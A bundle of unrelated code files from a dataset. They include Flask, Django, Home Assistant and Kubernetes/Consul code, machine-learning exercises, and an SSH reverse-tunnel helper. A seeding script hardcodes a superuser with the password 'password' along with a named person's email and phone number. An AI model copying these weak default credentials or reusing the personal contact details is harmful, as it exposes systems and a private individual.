MQTT_BROKER_URL='mqtt://localhost:1883',\n DATABASE=os.path.join(app.instance_path, 'cloud-controller.sqlite'),\n )\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n db.init_app(app)\n mqtt_client.init_app(app)\n Bootstrap(app)\n app.register_blueprint(user.bp)\n app.register_blueprint(thing.bp)\n app.register_blueprint(api.bp)\n\n return app\n","sub_path":"raspi-cloud-controller/cloud_flask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301590767","text":"import numpy\nimport pandas as pd\nfrom sklearn import linear_model\nimport scipy\nimport matplotlib.pyplot as plt\n\n\ndef polynomial_dataframe(feature, degree):\n df = pd.DataFrame()\n\n for power in range(1, degree + 1):\n col_name = 'power_' + str(power)\n df[col_name] = feature.apply(lambda x: numpy.power(x, power))\n\n return df\n\n\ndef get_rss(model, data, outcome):\n predictions = model.predict(data)\n residuals = outcome - predictions\n rss = numpy.sum(residuals * residuals)\n\n return rss\n\n\ndef get_polynomial_degree(training_set, validation_set, feature, target, max_degree):\n best_degree = 
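# (Editor's aside -- illustration only, mirroring get_rss above; the numbers
# are made up.) RSS is the sum of squared residuals between predictions and
# observed outcomes:
#
#     residuals = outcome - predictions
#     rss = numpy.sum(residuals * residuals)
#
# e.g. predictions [1.0, 2.0, 3.0] against outcomes [1.5, 2.0, 2.0]
#      -> 0.25 + 0.0 + 1.0 = 1.25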
0\n best_rss = 0\n\n for degree in range(1, max_degree + 1):\n poly_data_training = polynomial_dataframe(training_set[feature], degree)\n poly_data_validation = polynomial_dataframe(validation_set[feature], degree)\n\n model = linear_model.LinearRegression()\n model.fit(poly_data_training, training_set[[target]])\n\n rss = get_rss(model, poly_data_validation, validation_set[[target]])\n\n if rss[0] < best_rss or degree == 1:\n best_rss = rss[0]\n best_degree = degree\n\n return best_degree\n\n\n# Load test and training data\ndtype_dict = {'bathrooms': float, 'waterfront': int, 'sqft_above': int, 'sqft_living15': float, 'grade': int,\n 'yr_renovated': int, 'price': float, 'bedrooms': float, 'zipcode': str, 'long': float,\n 'sqft_lot15': float, 'sqft_living': float, 'floors': str, 'condition': int, 'lat': float, 'date': str,\n 'sqft_basement': int, 'yr_built': int, 'id': str, 'sqft_lot': int, 'view': int}\n\nsales = pd.read_csv('data/kc_house_data.csv', index_col=0, dtype=dtype_dict)\nsales_set1 = pd.read_csv('data/wk3_kc_house_set_1_data.csv', index_col=0, dtype=dtype_dict)\nsales_set2 = pd.read_csv('data/wk3_kc_house_set_2_data.csv', index_col=0, dtype=dtype_dict)\nsales_set3 = pd.read_csv('data/wk3_kc_house_set_3_data.csv', index_col=0, dtype=dtype_dict)\nsales_set4 = pd.read_csv('data/wk3_kc_house_set_4_data.csv', index_col=0, dtype=dtype_dict)\n\n\n\n# Make a 1 degree polynomial dataframe with sales['sqft_living15'] as the the feature. This will be our output variable\n# Run linear regression to get weights and plot\n# Plot observations + prediction model for 1st degree polynomial\npoly1_data = polynomial_dataframe(sales['sqft_living'], 1)\n\nmodel_1 = linear_model.LinearRegression()\nmodel_1.fit(poly1_data, sales[['price']])\n\n# plt.plot(poly1_data[['power_1']], sales[['price']], '.',\n# poly1_data['power_1'], model_1.predict(poly1_data), '-')\n# plt.show()\n\n# Do the same for a 2nd degree polynomial\npoly2_data = polynomial_dataframe(sales['sqft_living'], 2)\n\nmodel_2 = linear_model.LinearRegression()\nmodel_2.fit(poly2_data, sales[['price']])\n\nplt.plot(poly2_data[['power_1']], sales[['price']], '.',\n poly2_data['power_1'], model_2.predict(poly2_data), '.')\nplt.show()\n\n\n# Do the same for a 15th degree polynomial, on each of the 4 subsets\npoly15_data_set1 = polynomial_dataframe(sales_set1['sqft_living'], 15)\nmodel_15_set1 = linear_model.LinearRegression()\nmodel_15_set1.fit(poly15_data_set1, sales_set1[['price']])\n\nprint(model_15_set1.intercept_)\nprint(model_15_set1.coef_)\n\n# plt.plot(poly15_data_set1['power_1'], sales_set1['price'], '.',\n# poly15_data_set1['power_1'], model_15_set1.predict(poly15_data_set1), '.')\n# plt.show()\n\npoly15_data_set2 = polynomial_dataframe(sales_set2['sqft_living'], 15)\nmodel_15_set2 = linear_model.LinearRegression()\nmodel_15_set2.fit(poly15_data_set2, sales_set2[['price']])\n\nprint(model_15_set2.intercept_)\nprint(model_15_set2.coef_)\n\n# plt.plot(poly15_data_set2['power_1'], sales_set2['price'], '.',\n# poly15_data_set2['power_1'], model_15_set2.predict(poly15_data_set2), '.')\n# plt.show()\n\npoly15_data_set3 = polynomial_dataframe(sales_set3['sqft_living'], 15)\nmodel_15_set3 = linear_model.LinearRegression()\nmodel_15_set3.fit(poly15_data_set3, sales_set3[['price']])\n\nprint(model_15_set3.intercept_)\nprint(model_15_set3.coef_)\n\n# plt.plot(poly15_data_set3['power_1'], sales_set3['price'], '.',\n# poly15_data_set3['power_1'], model_15_set3.predict(poly15_data_set3), '.')\n# plt.show()\n\npoly15_data_set4 = 
polynomial_dataframe(sales_set4['sqft_living'], 15)\nmodel_15_set4 = linear_model.LinearRegression()\nmodel_15_set4.fit(poly15_data_set4, sales_set4[['price']])\n\nprint(model_15_set4.intercept_)\nprint(model_15_set4.coef_)\nprint('******************************************')\n\n# plt.plot(poly15_data_set4['power_1'], sales_set4['price'], '.',\n# poly15_data_set4['power_1'], model_15_set4.predict(poly15_data_set4), '.')\n# plt.show()\n\n# Using the Training set, work out which polynomial degree produces the lowest RSS on the Validation set\nsales_training = pd.read_csv('data/wk3_kc_house_train_data.csv', index_col=0, dtype=dtype_dict)\nsales_validation = pd.read_csv('data/wk3_kc_house_valid_data.csv', index_col=0, dtype=dtype_dict)\nsales_test = pd.read_csv('data/wk3_kc_house_test_data.csv', index_col=0, dtype=dtype_dict)\n\nbest_polynomial_degree = get_polynomial_degree(sales_training, sales_validation, 'sqft_living', 'price', 15)\nprint(\"Best polynomial degree: \" + str(best_polynomial_degree))\n\n# Compute RSS on Test dataset using the polynomial degree obtained from Validation set\npoly_best = polynomial_dataframe(sales_test['sqft_living'], best_polynomial_degree)\n\nbest_model = linear_model.LinearRegression()\nbest_model.fit(poly_best, sales_test[['price']])\n\nrss_best_model = get_rss(best_model, poly_best, sales_test[['price']])\nprint(rss_best_model)\n\n","sub_path":"course2-regression/week3/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155768108","text":"#\n# This script watches for changes to Kubernetes services.\n# It was inspired by the article https://medium.com/programming-kubernetes/building-stuff-with-the-kubernetes-api-part-3-using-python-aea5ab16f627\nimport os\nfrom kubernetes.config.config_exception import ConfigException\nimport requests\nfrom kubernetes import client, config, watch\nimport logging\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s')\n\n# set the Consul agent URL and other variables\nconsul_url = \"http://40.113.218.45:8500\"\ndatacenter = \"dev\"\n\ncontrol_plane_host = \"40.113.218.45\"\ncontrol_plane_ip = \"40.113.218.45\"\n\ndef main(k8s_context=None):\n # setup the namespace\n logging.info(f\"Running service for Kubernetes cluster {k8s_context}\")\n ns = os.getenv(\"K8S_NAMESPACE\")\n if ns is None:\n ns = \"\"\n\n # configure client\n config.load_kube_config(context=k8s_context)\n api = client.CoreV1Api()\n\n # Setup new watch\n w = watch.Watch()\n logging.info(\"Watching for Kubernetes services for all namespaces\")\n\n for item in w.stream(api.list_service_for_all_namespaces, timeout_seconds=0):\n svc = item['object']\n\n # get the metadata labels\n labels = svc.metadata.labels\n # look for a label named \"registerWithMesh\"\n if not labels:\n logging.info('No label found')\n else:\n try:\n if labels['registerWithMesh'] == \"true\":\n register_flag = True\n else:\n register_flag = False\n except KeyError:\n register_flag = False\n logging.info(f\"label: registerWithMesh not found for service {svc.metadata.name}\")\n # notify consul about the service\n if register_flag == True:\n notify_consul(svc, item['type'])\n\n\n# Notify the Consul agent\ndef notify_consul(service, action):\n if service.spec.type in(\"NodePort\", \"ClusterIP\", \"LoadBalancer\"):\n ports = service.spec.ports\n for port in ports:\n 
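            # (Editor's aside -- illustration only; the values below are made
            # up, not produced by this script.) Each named port registers as
            # its own Consul service "<namespace>-<service>-<port name>", so a
            # NodePort service "web" with port name "http" in namespace "dev"
            # would register roughly as:
            #   {"ID": "web", "Name": "dev-web-http", "Tags": ["dev"],
            #    "Address": "40.113.218.45", "Port": 30080}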
#\t\t\tprint \"Port\", port\n full_name = service.metadata.namespace + \"-\" + service.metadata.name + \"-\" + (port.name if port.name else \"\")\n if action == 'ADDED':\n # if action == 'DELETED':\n logging.info(f\"Registering new service {full_name}\")\n # full_consul_url = consul_url + \"/v1/catalog/register\"\n full_consul_url = consul_url + \"/v1/agent/service/register\"\n # determine which port to use depending on the service port type\n if service.spec.type == \"NodePort\":\n final_host = control_plane_host\n final_address = control_plane_ip\n final_port = port.node_port\n if service.spec.type == \"ClusterIP\":\n final_host = service.spec.cluster_ip\n final_address = service.spec.cluster_ip\n final_port = port.port\n if service.spec.type == \"LoadBalancer\":\n final_host = service.status.load_balancer.ingress[0].ip\n final_address = service.status.load_balancer.ingress[0].ip\n final_port = port.port\n\n consul_json = {\n \"ID\": service.metadata.name,\n \"Name\": full_name,\n \"Tags\": [service.metadata.namespace],\n \"Address\": final_address,\n \"Port\": final_port,\n # \"Meta\": {\n # \"redis_version\": \"4.0\"},\n \"EnableTagOverride\": False,\n \"Check\": {\"DeregisterCriticalServiceAfter\": \"90m\",\n # \"Args\": [\"/usr/local/bin/check_redis.py\"],\n \"HTTP\": f\"http://{final_address}:{final_port}/health\",\n \"Interval\": \"90s\"\n }\n }\n logging.info(f\"request {full_consul_url} {consul_json}\")\n html_headers = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n response = requests.put(full_consul_url, json=consul_json, headers=html_headers)\n if response.status_code != 200:\n logging.info(f\"Status: {response.status_code} Headers: {response.headers} Response content: {response.text}\")\n\n if action == 'DELETED':\n # if action == 'ADDED':\n serviceID = service.metadata.name\n logging.info(f\"Deregistering {serviceID}\")\n full_consul_url = consul_url + \"/v1/agent/service/deregister/\" + serviceID\n # assemble the Consul API payload\n logging.info(full_consul_url)\n response = requests.put(full_consul_url)\n logging.info(response.status_code)\n if response.status_code != 200:\n logging.info('Status:', response.status_code, 'Headers:', response.headers, 'Response content:',\n response.text)\n else:\n logging.info(\"Skipping service\", service.metadata.name, \"becuase it is not a NodePort service type\")\n\n\nif __name__ == '__main__':\n main(k8s_context='Surfers2Cluster')\n","sub_path":"py-k8s-service_watch.py","file_name":"py-k8s-service_watch.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466617156","text":"# This code is licensed under the MIT License (see LICENSE file for details)\nimport cffi\nimport pathlib\n\n# point-in-polygon code from: https://wrf.ecse.rpi.edu/Research/Short_Notes/pnpoly.html\n# nvert Number of vertices in the polygon. Whether to repeat the first vertex at the end is discussed below.\n# vertx, verty Arrays containing the x- and y-coordinates of the polygon's vertices.\n# testx, testy X- and y-coordinate of the test point.\n\n# LICENSE for the pnpoly_c code below:\n#\n# Copyright (c) 1970-2003, Wm. 
Randolph Franklin\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimers.\n# Redistributions in binary form must reproduce the above copyright notice in the documentation and/or other materials provided with the distribution.\n# The name of W. Randolph Franklin may not be used to endorse or promote products derived from this Software without specific prior written permission.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\npnpoly_c = \"\"\"int pnpoly(int nvert, float *vertx, float *verty, float testx, float testy) {\n int i, j, c = 0;\n for (i = 0, j = nvert-1; i < nvert; j = i++) {\n if ( ((verty[i]>testy) != (verty[j]>testy)) &&\n\t (testx < (vertx[j]-vertx[i]) * (testy-verty[i]) / (verty[j]-verty[i]) + vertx[i]) )\n c = !c;\n }\n return c;\n}\n\"\"\"\n\npnpoly_h = pnpoly_c.split('\\n')[0][:-1] + ';'\n\nffibuilder = cffi.FFI()\ndirectory = pathlib.Path(__file__).parent\nffibuilder.cdef(pnpoly_h)\nffibuilder.set_source('zplib.curve._pnpoly', pnpoly_c)\n\nif __name__ == \"__main__\":\n ffibuilder.compile()\n","sub_path":"zplib/curve/build_pnpoly.py","file_name":"build_pnpoly.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100808027","text":"\"\"\"Diagnostics support for Asuswrt.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.components.diagnostics import async_redact_data\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_PASSWORD, CONF_USERNAME\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import device_registry as dr, entity_registry as er\n\nfrom .const import DATA_ASUSWRT, DOMAIN\nfrom .router import AsusWrtRouter\n\nTO_REDACT = {CONF_PASSWORD, CONF_USERNAME}\n\n\nasync def async_get_config_entry_diagnostics(\n hass: HomeAssistant, entry: ConfigEntry\n) -> dict[str, dict[str, Any]]:\n \"\"\"Return diagnostics for a config entry.\"\"\"\n data = {\"entry\": async_redact_data(entry.as_dict(), TO_REDACT)}\n\n router: AsusWrtRouter = hass.data[DOMAIN][entry.entry_id][DATA_ASUSWRT]\n\n # Gather information how this AsusWrt device is represented in Home Assistant\n device_registry = dr.async_get(hass)\n entity_registry = er.async_get(hass)\n hass_device = device_registry.async_get_device(\n identifiers=router.device_info[\"identifiers\"]\n )\n if not hass_device:\n return data\n\n data[\"device\"] = {\n \"name\": hass_device.name,\n \"name_by_user\": hass_device.name_by_user,\n \"disabled\": hass_device.disabled,\n \"disabled_by\": hass_device.disabled_by,\n 
\"device_info\": async_redact_data(dict(router.device_info), {\"identifiers\"}),\n \"entities\": {},\n \"tracked_devices\": [],\n }\n\n hass_entities = er.async_entries_for_device(\n entity_registry,\n device_id=hass_device.id,\n include_disabled_entities=True,\n )\n\n for entity_entry in hass_entities:\n state = hass.states.get(entity_entry.entity_id)\n state_dict = None\n if state:\n state_dict = dict(state.as_dict())\n # The entity_id is already provided at root level.\n state_dict.pop(\"entity_id\", None)\n # The context doesn't provide useful information in this case.\n state_dict.pop(\"context\", None)\n\n data[\"device\"][\"entities\"][entity_entry.entity_id] = {\n \"name\": entity_entry.name,\n \"original_name\": entity_entry.original_name,\n \"disabled\": entity_entry.disabled,\n \"disabled_by\": entity_entry.disabled_by,\n \"entity_category\": entity_entry.entity_category,\n \"device_class\": entity_entry.device_class,\n \"original_device_class\": entity_entry.original_device_class,\n \"icon\": entity_entry.icon,\n \"original_icon\": entity_entry.original_icon,\n \"unit_of_measurement\": entity_entry.unit_of_measurement,\n \"state\": state_dict,\n }\n\n for device in router.devices.values():\n data[\"device\"][\"tracked_devices\"].append(\n {\n \"name\": device.name or \"Unknown device\",\n \"ip_address\": device.ip_address,\n \"last_activity\": device.last_activity,\n }\n )\n\n return data\n","sub_path":"homeassistant/components/asuswrt/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"489571429","text":"#1963. Minimum Number of Swaps to Make the String Balanced\n#You are given a 0-indexed string s of even length n. The string consists of exactly n / 2 opening brackets '[' and n / 2 closing brackets ']'.\n\n#A string is called balanced if and only if:\n\n#It is the empty string, or\n#It can be written as AB, where both A and B are balanced strings, or\n#It can be written as [C], where C is a balanced string.\n#You may swap the brackets at any two indices any number of times.\n\n#Return the minimum number of swaps to make s balanced.\n\n \n\n#Example 1:\n\n#Input: s = \"][][\"\n#Output: 1\n#Explanation: You can make the string balanced by swapping index 0 with index 3.\n#The resulting string is \"[[]]\".\n\nclass Solution:\n def minSwaps(self, s: str) -> int:\n \n cnt_open = 0\n \n for c in s:\n if c == '[':\n cnt_open += 1\n elif cnt_open > 0:\n cnt_open -= 1\n \n return (cnt_open + 1)//2\n \n ","sub_path":"1963. Minimum Number of Swaps to Make the String Balanced.py","file_name":"1963. 
Minimum Number of Swaps to Make the String Balanced.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"559647087","text":"import heapq\nimport math\n\nMAZE0=\"\"\"\nS...\n.#..\n.##.\n.#G.\n\"\"\"\n\n\nMAZE1=\"\"\"\n.....................##.......\n.S...................##.......\n.....................##.......\n...##................##.......\n...##........##......##.......\n...##........##......#####....\n...##........##......#####....\n...##........##...............\n...##........##...............\n...##........##...............\n...##........##...............\n...##........##...............\n.............##...............\n.............##..........G....\n.............##...............\"\"\"\n\niterations=0\n\nclass Maze:\n\n def __init__(self, maze):\n self.maze = maze.strip()\n self.size = (len(self.maze.split()[0]), len(self.maze.split()))\n self.maze = \"\".join(self.maze.split())\n self.start = (self.maze.find(\"S\") % self.size[0], self.maze.find(\"S\") // self.size[0])\n self.goal = (self.maze.find(\"G\") % self.size[0], self.maze.find(\"G\") // self.size[0])\n \n def isfree(self, x, y):\n if x < 0 or y < 0 or x >= self.size[0] or y >= self.size[1]:\n return False\n\n return self.maze[x + y * self.size[0]] != \"#\"\n\n def neighbours(self, node):\n \n x, y = node\n result = set()\n\n for dx in [-1,0,1]:\n for dy in [-1,0,1]:\n if self.isfree(x+dx, y+dy):\n result.add((x+dx, y+dy))\n result.discard((x,y))\n return result\n\n def weight(self, nodeA, nodeB):\n \"\"\" Constant weight all over the maze\n \"\"\"\n return 1\n\n def __iter__(self):\n \"\"\"Returns all the cells in the maze that are free\n \"\"\"\n for node in [(x,y) for x in range(self.size[0]) \n for y in range(self.size[1]) \n if self.isfree(x,y)]:\n yield node\n\n def __str__(self):\n \"\"\"Inserts a line break at the end of each maze row\n and returns the corresponding string.\n \"\"\"\n return \"\\n\".join([self.maze[i:i+self.size[0]] for i in range(0, len(self.maze), self.size[0])]) + \"\\n\"\n\n def printpath(self, path):\n \"\"\" Overlays 'o' on top of the maze, at the coordinates given in the\n path, and prints the result.\n \"\"\"\n printout = list(self.maze)\n for x,y in path:\n printout[x + y * self.size[0]] = 'o'\n\n print(\"\\n\".join([\"\".join(printout[i:i+self.size[0]]) for i in range(0, len(printout), self.size[0])]) + \"\\n\")\n\n\n\nclass PriorityQueue:\n \"\"\" Simple priority queue: get_cheapest always returns the node with the\n lowest 'priority' value.\n\n Implementation taken from https://www.redblobgames.com/pathfinding/a-star/implementation.html\n \"\"\"\n def __init__(self):\n self.elements = []\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, item, priority):\n heapq.heappush(self.elements, (priority, item))\n \n def get_cheapest(self):\n return heapq.heappop(self.elements)[1]\n\n\ndef dijkstra(graph):\n global iterations\n\n cost_to = {} # maps nodes to cost to 'start'\n come_from = {} # needed to reconstruct shortest path\n\n for node in graph:\n cost_to[node] = math.inf # initial cost from 'start' to 'node'. 
Requires Python >=3.5!\n\n cost_to[graph.start] = 0\n\n frontier = PriorityQueue()\n frontier.put(graph.start, 0)\n\n while not frontier.empty():\n u = frontier.get_cheapest() # remove best node\n\n if u == graph.goal:\n break\n\n for v in graph.neighbours(u): # iterate over nodes connected to u\n if cost_to[u] + graph.weight(u, v) < cost_to[v]: # new shorter path to v!\n cost_to[v] = cost_to[u] + graph.weight(u, v)\n frontier.put(v, cost_to[v])\n come_from[v] = u\n iterations+=1\n\n #path = getpath(v, come_from)\n #maze.printpath(path)\n #input()\n\n\n return cost_to, come_from\n\ndef getpath(goal, come_from):\n path = []\n node = goal\n while node in come_from:\n path = [node] + path # append at the front of our path\n node = come_from[node]\n\n return path\n\n\nif __name__==\"__main__\":\n\n maze = Maze(MAZE1)\n \n print(maze)\n input()\n\n cost_to, come_from = dijkstra(maze)\n path = getpath(maze.goal, come_from)\n\n maze.printpath(path)\n\n print(\"%d iterations\" % iterations)\n","sub_path":"demos/pathfinding/pathfinding.py","file_name":"pathfinding.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"464708173","text":"\"\"\"askmeout URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom app import views\nfrom django.conf.urls import url\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # url(r'^admin/', admin.site.urls),\n url(r'^login/$', views.login_blog),\n url(r'^register/$', views.register),\n url(r'^logout/$', views.logout_blog),\n url(r'^ask/', views.ask),\n url(r'^forum/', views.forum),\n url(r'^jargon/', views.jargon),\n url(r'^define/', views.define),\n url(r'^youtube/', views.youtube),\n url(r'^courses/', views.courses),\n url(r'^coursera', views.coursera),\n url(r'^search', views.search),\n url(r'^searchDef', views.searchDef),\n url(r'^posts/$', views.posts),\n url(r'^new_post/$', views.new_post),\n ####################################\n url(r'^sendAns/(\\d+)$', views.sendAns),\n url(r'^sentQues/$', views.sentQues),\n url(r'^questionDetail/(\\d+)$', views.questionDetail),\n]\n","sub_path":"askmeout/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"57568050","text":"import logging\nimport socket\nimport threading\n\nimport paramiko\n\nfrom xdcs.app import xdcs\nfrom xdcs.utils.sockutils import couple_socks\n\nlogger = logging.getLogger(__name__)\n\n\nclass _ReverseForwardContext:\n def __init__(self,\n local_port: int,\n server_addr: str,\n server_port: int,\n asynchronous: bool) -> None:\n self.asynchronous = asynchronous\n self.local_port = local_port\n self.server_addr = server_addr\n self.server_port = server_port\n self.thread = None\n\n def __enter__(self):\n logger.debug(\"Connecting to \" + self.server_addr + \":\" + str(self.server_port))\n\n server_auth_name = xdcs().config('server.auth.name')\n server_auth_key = xdcs().config('server.auth.key', None)\n server_auth_password = xdcs().config('server.auth.password', None)\n\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(\n self.server_addr, self.server_port,\n username=server_auth_name,\n pkey=paramiko.RSAKey.from_private_key_file(server_auth_key),\n password=server_auth_password,\n look_for_keys=False,\n )\n logger.debug(\"Connected to server's sshd\")\n\n self.transport = client.get_transport()\n remote_port = self.transport.request_port_forward(\"127.0.0.1\", 0)\n logger.debug(\"Now forwarding remote port %d to local port %d\", remote_port, self.local_port)\n\n if self.asynchronous:\n self.thread = threading.Thread(target=self._transport_thread, args=())\n self.thread.setDaemon(True)\n self.thread.start()\n else:\n self._transport_thread()\n\n def _transport_thread(self):\n channel = None\n while channel is None:\n channel = self.transport.accept(1000)\n\n self._handle_opened_channel(channel)\n\n def _handle_opened_channel(self, channel):\n sock = socket.socket()\n try:\n sock.connect(('127.0.0.1', self.local_port))\n except Exception as e:\n logger.error(\"Forwarding request to local port %d failed: %r\", self.local_port, e)\n return\n\n logger.debug(\"Tunnel opened %r -> %r -> %r\", channel.origin_addr, channel.getpeername(),\n ('127.0.0.1', self.local_port))\n couple_socks(sock, channel)\n logger.debug(\"Tunnel closed from %r\", channel.origin_addr)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.transport.close()\n\n\ndef rforward(\n local_port: int,\n server_addr: str,\n server_port: int,\n asynchronous: bool = True) -> _ReverseForwardContext:\n return 
_ReverseForwardContext(local_port, server_addr, server_port, asynchronous)\n","sub_path":"xdcs-agent/src/main/python/xdcs/utils/rforward.py","file_name":"rforward.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"485221632","text":"def create_countries():\n from ujumbe.apps.weather.models import Country\n import pycountry\n for _ in pycountry.countries:\n Country.objects.get_or_create(\n alpha2=_.alpha_2,\n alpha3=_.alpha_3,\n name=_.name\n )\n return Country.objects.all()\n\n\ndef create_kenyan_counties():\n from ujumbe.apps.weather.models import Country, Location\n kenya, _ = Country.objects.get_or_create(name=\"Kenya\", alpha2=\"KE\", alpha3=\"KEN\")\n kenyan_counties = [\n \"Baringo\",\n \"Bomet\",\n \"Bungoma\",\n \"Busia\",\n \"Elgeyo Marakwet\",\n \"Embu\",\n \"Garissa\",\n \"Homa Bay\",\n \"Isiolo\",\n \"Kajiado\",\n \"Kakamega\",\n \"Kericho\",\n \"Kiambu\",\n \"Kilifi\",\n \"Kirinyaga\",\n \"Kisii\",\n \"Kisumu\",\n \"Kitui\",\n \"Kwale\",\n \"Laikipia\",\n \"Lamu\",\n \"Machakos\",\n \"Makueni\",\n \"Mandera\",\n \"Meru\",\n \"Migori\",\n \"Marsabit\",\n \"Mombasa\",\n \"Muranga\",\n \"Nairobi\",\n \"Nakuru\",\n \"Nandi\",\n \"Narok\",\n \"Nyamira\",\n \"Nyandarua\",\n \"Nyeri\",\n \"Samburu\",\n \"Siaya\",\n \"Taita Taveta\",\n \"Tana River\",\n \"Tharaka Nithi\",\n \"Trans Nzoia\",\n \"Turkana\",\n \"Uasin Gishu\",\n \"Vihiga\",\n \"Wajir\",\n \"West Pokot\",\n ]\n for county in kenyan_counties:\n Location.objects.get_or_create(\n name=county,\n country=kenya\n )\n return Location.objects.all()\n\n\ndef create_super_user_with_profile(username: str, password: str, email: str, first_name: str, last_name: str,\n telephone: str):\n from ujumbe.apps.profiles.models import Profile\n\n from django.contrib.auth.models import User # TODO: change this to get_user_model\n\n superuser, created = User.objects.get_or_create(\n first_name=first_name,\n last_name=last_name,\n email=email,\n is_staff=True,\n is_superuser=True,\n is_active=True,\n username=username,\n )\n superuser.set_password(password)\n superuser.save()\n profile, created = Profile.objects.get_or_create(\n user=superuser,\n telephone=telephone\n )\n return profile\n\n\ndef create_celery_beat_tasks():\n from django_celery_beat.models import PeriodicTask, IntervalSchedule\n # executes every 10 seconds.\n schedule, created = IntervalSchedule.objects.get_or_create(\n every=10,\n period=IntervalSchedule.SECONDS\n )\n PeriodicTask.objects.get_or_create(\n interval=schedule,\n name=\"Check and send subscriptions\",\n task=\"ujumbe.apps.profiles.tasks.check_and_send_user_subscriptions\"\n )\n PeriodicTask.objects.get_or_create(\n interval=schedule,\n name=\"Check and process messages\",\n task=\"ujumbe.apps.africastalking.tasks.process_incoming_messages\"\n )\n\n\ndef run():\n create_countries()\n # create_kenyan_counties()\n create_super_user_with_profile(username=\"admin\", password=\"password\", email=\"jerryshikanga@gmail.com\",\n first_name=\"Jerry\", last_name=\"Shikanga\", telephone=\"+254727447101\")\n create_celery_beat_tasks()\n","sub_path":"scripts/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"496294131","text":"from django.db import models\nfrom django.utils import timezone\nfrom pygments.lexers import get_all_lexers\nfrom pygments.styles import get_all_styles\nfrom pygments.lexers import 
get_lexer_by_name\nfrom pygments.formatters.html import HtmlFormatter\n\nLEXERS = [item for item in get_all_lexers() if item[1]]\nLANGUAGE_CHOICES = sorted([(item[1][0], item[0]) for item in LEXERS])\nSTYLE_CHOICES = sorted((item, item) for item in get_all_styles())\n\nclass Post(models.Model):\n author = models.ForeignKey('auth.User')\n text = models.TextField(default='', blank=True)\n created_date = models.DateTimeField(\n default=timezone.now)\n published_date = models.DateTimeField(\n blank=True, null=True)\n #added after REST API implementation (a duplicate 'title' field defined above was\n #removed; Python keeps only the last class-body assignment anyway)\n created = models.DateTimeField(auto_now_add=True)\n title = models.CharField(max_length=100)\n code = models.TextField(blank=True)\n linenos = models.BooleanField(default=False)\n language = models.CharField(choices=LANGUAGE_CHOICES, default='python', max_length=100)\n style = models.CharField(choices=STYLE_CHOICES, default='friendly', max_length=100)\n owner = models.ForeignKey('auth.User', related_name='items', on_delete=models.CASCADE, null=True, blank=True)\n\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n","sub_path":"todoapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 